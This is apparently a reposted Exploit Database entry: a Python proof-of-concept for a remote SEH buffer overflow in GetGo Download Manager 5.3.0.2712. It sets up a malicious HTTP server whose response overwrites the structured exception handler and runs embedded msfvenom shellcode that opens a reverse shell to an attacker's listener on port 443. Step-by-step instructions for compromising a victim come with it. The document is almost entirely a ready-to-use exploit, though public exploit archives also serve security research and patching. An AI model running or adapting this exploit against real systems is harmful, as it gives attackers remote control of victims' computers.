GetGo Download Manager 5.3.0.2712 – Buffer Overflow (SEH)

• Exploit Database
• 16 阅读

• 作者： bzyo
  日期： 2018-02-27
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44187/

• #!/usr/bin/python
  
  #
  # Exploit Author: bzyo
  # Twitter: @bzyo_
  # Exploit Title: GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow (SEH)
  # Date: 02-24-2018
  # Vulnerable Software: GetGo Download Manager 5.3.0.2712
  # Vendor Homepage: http://www.getgosoft.com/
  # Version: 5.3.0.2712
  # Software Link: https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe
  # Tested On: Windows XP SP3
  #
  #
  # PoC: 
  # 1. setup listener 443 on attacking machine
  # 2. run script on attacking machine
  # 3. open app on victim machine
  # 4. go to download
  # 5. select new, add http://attackerip to URL, index.html to File Name, and select OK
  # 6. check listener, remote shell
  #
  
  import sys
  import socket
  import os
  import time
  
  host = "192.168.0.149"
  port = 80
   
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.bind((host, port))
  s.listen(1)
  print "\n[+] listening on %d ..." % port
  
  bz, addr = s.accept()
  print "[+] connection accepted from %s" % addr[0]
  
  junk = "A"*20
  
  #jump 6 
  nseh = "\xeb\x06\x90\x90"
  
  #0x72d11f39 : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [msacm32.drv]
  seh = "\x39\x1f\xd1\x72"
  
  #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -b "\x00" -f c
  #Payload size: 351 bytes
  reverse = (
  "\xba\x8f\xf6\x0e\x24\xd9\xf7\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
  "\x52\x31\x50\x12\x83\xc0\x04\x03\xdf\xf8\xec\xd1\x23\xec\x73"
  "\x19\xdb\xed\x13\x93\x3e\xdc\x13\xc7\x4b\x4f\xa4\x83\x19\x7c"
  "\x4f\xc1\x89\xf7\x3d\xce\xbe\xb0\x88\x28\xf1\x41\xa0\x09\x90"
  "\xc1\xbb\x5d\x72\xfb\x73\x90\x73\x3c\x69\x59\x21\x95\xe5\xcc"
  "\xd5\x92\xb0\xcc\x5e\xe8\x55\x55\x83\xb9\x54\x74\x12\xb1\x0e"
  "\x56\x95\x16\x3b\xdf\x8d\x7b\x06\xa9\x26\x4f\xfc\x28\xee\x81"
  "\xfd\x87\xcf\x2d\x0c\xd9\x08\x89\xef\xac\x60\xe9\x92\xb6\xb7"
  "\x93\x48\x32\x23\x33\x1a\xe4\x8f\xc5\xcf\x73\x44\xc9\xa4\xf0"
  "\x02\xce\x3b\xd4\x39\xea\xb0\xdb\xed\x7a\x82\xff\x29\x26\x50"
  "\x61\x68\x82\x37\x9e\x6a\x6d\xe7\x3a\xe1\x80\xfc\x36\xa8\xcc"
  "\x31\x7b\x52\x0d\x5e\x0c\x21\x3f\xc1\xa6\xad\x73\x8a\x60\x2a"
  "\x73\xa1\xd5\xa4\x8a\x4a\x26\xed\x48\x1e\x76\x85\x79\x1f\x1d"
  "\x55\x85\xca\xb2\x05\x29\xa5\x72\xf5\x89\x15\x1b\x1f\x06\x49"
  "\x3b\x20\xcc\xe2\xd6\xdb\x87\xcc\x8f\xe3\xc2\xa5\xcd\xe3\xed"
  "\x8e\x5b\x05\x87\xe0\x0d\x9e\x30\x98\x17\x54\xa0\x65\x82\x11"
  "\xe2\xee\x21\xe6\xad\x06\x4f\xf4\x5a\xe7\x1a\xa6\xcd\xf8\xb0"
  "\xce\x92\x6b\x5f\x0e\xdc\x97\xc8\x59\x89\x66\x01\x0f\x27\xd0"
  "\xbb\x2d\xba\x84\x84\xf5\x61\x75\x0a\xf4\xe4\xc1\x28\xe6\x30"
  "\xc9\x74\x52\xed\x9c\x22\x0c\x4b\x77\x85\xe6\x05\x24\x4f\x6e"
  "\xd3\x06\x50\xe8\xdc\x42\x26\x14\x6c\x3b\x7f\x2b\x41\xab\x77"
  "\x54\xbf\x4b\x77\x8f\x7b\x7b\x32\x8d\x2a\x14\x9b\x44\x6f\x79"
  "\x1c\xb3\xac\x84\x9f\x31\x4d\x73\xbf\x30\x48\x3f\x07\xa9\x20"
  "\x50\xe2\xcd\x97\x51\x27")
  
  fill = "D"*(4055 - len(reverse))
  
  payload = junk + nseh + seh + reverse + fill
  
  buffer = payload + "\r"
  buffer+= payload + "\r"
  buffer+= payload + "\r\n"
  
  print bz.recv(1000)
  bz.send(buffer)
  print "[+] sending buffer ok\n"
  
  time.sleep(3)
  bz.close()
  s.close()